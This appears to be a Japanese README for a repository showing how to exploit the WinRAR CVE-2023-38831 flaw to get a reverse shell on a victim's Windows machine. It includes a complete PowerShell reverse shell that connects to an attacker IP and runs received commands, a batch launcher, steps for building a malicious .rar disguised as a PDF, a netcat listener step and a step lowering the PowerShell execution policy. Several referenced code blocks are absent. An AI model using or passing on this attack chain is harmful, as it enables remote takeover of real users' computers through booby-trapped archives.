
Winrarの脆弱性CVE-2023-38831を悪用してリバースシェルを取得するための必要な手順(6.23より前のバージョン)
このリポジトリでは、WinRARの脆弱性CVE-2023-38831を悪用して、被害者のWindowsマシンから攻撃者のKali Linuxマシンへリバースシェルを取得する方法を紹介します。
このリポジトリのコンテンツをダウンロードします:

次に、この脆弱性を悪用するために必要なPythonの依存関係を以下のコマンドでインストールします:
pip install rarce

リバースシェルを提供する悪意のあるコードを実行します。これはrevshells.comのウェブサイトから取得します(攻撃者のIPアドレスとポートを指定):

$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
このPowerShellコードを.ps1ファイルに保存します(後で実行されます):

リバースシェルを取得するためのps1コードを入手したら、osライブラリを使用して.ps1ファイルを実行するPythonファイルを作成します:

次に、以下のコードを含む.batファイルを作成します:

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe
rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py
rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%
rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause
この時点で、悪意のあるWinRARファイルを作成する必要があります:

.rar内のdocumento.pdfファイルを実行します:


最後に、攻撃マシンからnetcatで待受状態にしておくと、リバースシェルを受信できます:

PowerShellコマンドを実行できない場合は、システムでスクリプトの実行を有効にする必要があります:


有効にします:

そして、以下のコマンドを実行します:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser